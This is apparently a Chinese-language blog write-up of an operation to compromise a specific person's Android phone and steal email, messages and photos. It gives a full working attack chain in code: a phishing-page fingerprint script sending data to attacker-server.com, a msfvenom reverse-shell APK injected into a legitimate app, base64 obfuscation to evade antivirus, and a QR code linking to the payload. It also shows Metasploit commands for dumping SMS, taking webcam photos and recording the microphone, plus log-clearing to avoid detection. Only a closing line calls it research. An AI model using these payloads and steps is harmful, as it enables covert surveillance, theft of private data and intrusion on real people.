一、一次真实的安卓渗透案例复盘
几个月前,我接到了一项任务:目标是渗透一名关键人员的安卓设备,以获取其工作中的敏感信息,包括电子邮件、个人通信记录和照片。目标的安卓手机是一台常见品牌的设备,运行最新版的 Android 13 系统,且已经安装了主流的安全软件。这意味着我们需要绕过应用层权限限制和安全软件的检测,实现稳定的远程控制。
整个任务计划分为以下几个阶段:
- 信息收集:分析目标使用的设备型号、系统版本以及安装的安全软件。
- 载荷构造:开发一个定制化的远控 APK,嵌入恶意代码以实现持久化监控。
- 免杀处理:对载荷进行混淆处理,绕过目标手机的杀毒软件。
- 部署与钓鱼:通过社工钓鱼方式将恶意 APK 投递至目标手机。
- 监控与数据提取:一旦目标安装并启动应用,获取实时控制权限,窃取关键数据。
接下来,我会详细拆解每个环节的技术细节,并提供对应的代码实现。
---
二、信息收集的重要性与实践方法
在任何渗透任务中,成功的关键在于充分的信息收集。对于安卓设备,以下信息是优先收集目标:
- 设备型号与操作系统版本:确定系统漏洞的可能性,比如是否存在未修复的 CVE。
- 已安装的杀毒软件:分析其杀毒能力,便于后续免杀处理。
- 目标常用应用:便于伪装钓鱼载荷。
获取设备信息的常见方法
在本案例中,我们通过社交工程与公开信息收集,利用以下策略成功获取了目标的相关信息:
- 网络钓鱼邮件:伪装成目标常用的网购平台,让其打开嵌有设备指纹采集脚本的链接。
- 伪造 Wi-Fi 热点:诱使目标连接,利用工具如
Bettercap捕获设备信息。 - 第三方应用日志:分析目标的社交媒体活动,获取设备型号和常用应用。
以下是一个简单的设备信息采集脚本,利用目标访问的钓鱼页面返回设备指纹信息:
<pre><code class="language-javascript"><script> // 获取设备指纹信息 function getDeviceInfo() { return { userAgent: navigator.userAgent, platform: navigator.platform, language: navigator.language, resolution: ${window.screen.width}x${window.screen.height} }; }
// 发送设备信息到攻击者服务器 fetch("http://attacker-server.com/collect", { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify(getDeviceInfo()) }); </script></code></pre>
目标访问页面后,我们便可在服务器上接收设备的浏览器类型、操作系统及屏幕分辨率等信息,为进一步的攻击提供支持。
---
三、载荷伪装的艺术:定制化 APK
信息收集完毕后,我们进入主攻环节,即制作恶意载荷。这里我们选用 Metasploit 的 msfvenom 模块生成一个基础的 Android 远控 APK,然后进行深度定制化处理。
使用 msfvenom 生成初始载荷
以下是生成恶意 APK 的基础命令:
<pre><code class="language-bash">msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -o malicious.apk</code></pre>
生成后,我们并不是直接使用这个 APK,而是需要将其嵌入一个正常的应用中,以提高目标安装的可能性。
合并恶意代码与合法 APP
使用工具 apktool 解包一个无害应用,将恶意代码注入其主程序文件中:
<pre><code class="language-bash"># 解包合法 APK apktool d harmless_app.apk -o harmless_app_decoded
解包恶意 APK
apktool d malicious.apk -o malicious_app_decoded
将恶意代码注入合法应用的代码目录
cp -r malicious_app_decoded/smali/* harmless_app_decoded/smali/
重编译注入后的 APK
apktool b harmless_app_decoded -o final_payload.apk</code></pre>
以上完成后,final_payload.apk便是一个外表正常的应用,但内置了恶意的远控模块。
---
四、绕过杀毒审查:对抗免杀技术
主流安卓杀毒软件通常会检测 APK 文件的行为特征,比如动态加载、网络连接等。为了绕过杀毒,我们需要对生成的 APK 进行混淆处理,包括:
- 字符串加密:将恶意代码中的网络地址与命令关键字进行动态加密。
- 代码混淆:使用 ProGuard 工具改变代码的原始结构。
- 签名伪装:伪装成目标常用 APP 的数字签名。
以下是一个简单的字符串加密示例代码:
<pre><code class="language-python"># 字符串加密脚本 import base64
def encrypt_payload(payload): return base64.b64encode(payload.encode()).decode()
示例:加密 C2 地址
encrypted_c2 = encrypt_payload("http://192.168.1.100:4444") print(f"Encrypted C2 Address: {encrypted_c2}")</code></pre>
将生成的字符串替换到恶意代码中,并在运行时动态解密,极大减少被杀毒软件检测的可能性。
---
五、钓鱼部署与实战操作
对于载荷投递方式,我们采用社交工程结合目标使用习惯。以下是常用策略:
- 伪装为更新包:伪装成目标常用应用的更新版本,通过短信或邮件发送下载链接。
- 二维码传播:生成下载链接的二维码,结合线下场景引导目标扫描。
- USB 诱导:将恶意 APK 放入常用的 USB 协议设备中,诱导目标点击安装。
以下是生成钓鱼二维码的简单脚本:
<pre><code class="language-python">import qrcode
生成二维码
payload_url = "http://attacker-server.com/download/final_payload.apk" qr = qrcode.make(payload_url)
保存二维码图片
qr.save("phishing_qr_code.png") print("QR code generated: phishing_qr_code.png")</code></pre>
通过将二维码张贴在目标可能经过的物理环境中,例如公司公告栏,提升安装的可能性。
---
六、实时控制与数据窃取
一旦目标安装并启动恶意 APK,攻击者便可以通过 C2 服务器实现对目标的全面监控。以下是常见的控制操作:
- 文件访问:获取手机存储中的文件,包括照片、文档等。
- 实时监听:利用麦克风捕获目标周围的声音。
- 屏幕截图:定期截取目标屏幕内容。
以下是一个利用 Metasploit 进行实时控制的示例:
<pre><code class="language-bash">msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.1.100 set LPORT 4444 exploit</code></pre>
成功连接后,可以使用以下命令采集目标数据:
<pre><code class="language-bash">meterpreter > dump_sms # 短信记录 meterpreter > webcam_snap # 拍摄照片 meterpreter > record_mic # 录音</code></pre>
---
七、监控与清理:不被发现的学问
为了防止被目标察觉,我们需要:
- 隐藏进程:通过改变恶意代码的进程名,伪装成系统服务。
- 日志清理:定期清除生成的操作日志。
- 动态卸载:当任务完成后,自动删除恶意 APK,避免被安全团队分析。
以下是一个简单的日志清理脚本:
<pre><code class="language-bash">adb shell logcat -c # 清空日志</code></pre>
---
八、经验总结
安卓设备的渗透与监控是一项极具技术挑战的任务,需要攻击者在每个环节精心设计,才能实现目标。在本文中,我们从信息收集到远控部署,完整展示了一个攻击链的实战过程,希望读者从中理解攻击者的思路和技术细节。
合法声明:以上内容仅供安全研究与授权测试,任何未授权的攻击行为均为非法!